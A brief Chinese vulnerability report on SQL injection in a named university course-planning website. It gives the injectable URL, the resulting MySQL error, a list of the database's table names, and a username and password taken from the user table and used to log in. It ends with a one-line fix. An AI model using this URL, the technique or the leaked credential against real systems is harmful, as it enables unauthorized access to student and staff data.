某处过滤不当导致的sql注入，学分刷起来！

访问：

http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27

 

错误信息：

mySQL 查询错误: SELECT Zhy.DepartID, Zhy.Zhy_Code, Department.Depart_coll, Department.Depart_major  FROM Zhy , Department WHERE Zhy.DepartID = Department.DepartID  AND Department.Depart_coll ='广东外语外贸大学%''

 

mySQL 发生错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''广东外语外贸大学%''' at line 1

mySQL 错误代码: 1064

时间: Sunday 30th 2014f March 2014 11:34:48 AM

 

刷一下表结构

 

[18 tables]

+---------------------------------------+

| News                                  |

| user                                  |

| course                                |

| course_recepter                       |

| course_resourse                       |

| coursevaild                           |

| department                            |

| error                                 |

| excellentcourse                       |

| majorcode                             |

| mcteachplan                           |

| mcteachplanarrangement                |

| noteinfo                              |

| receive                               |

| selcourse                             |

| studentinfo                           |

| systemrecord                          |

| zhy                                   |

+---------------------------------------+

 

首页就有登陆入口，整一条user记录，登陆一下

lihh pwd:lihh

 

如图：
 

修复：

加强过滤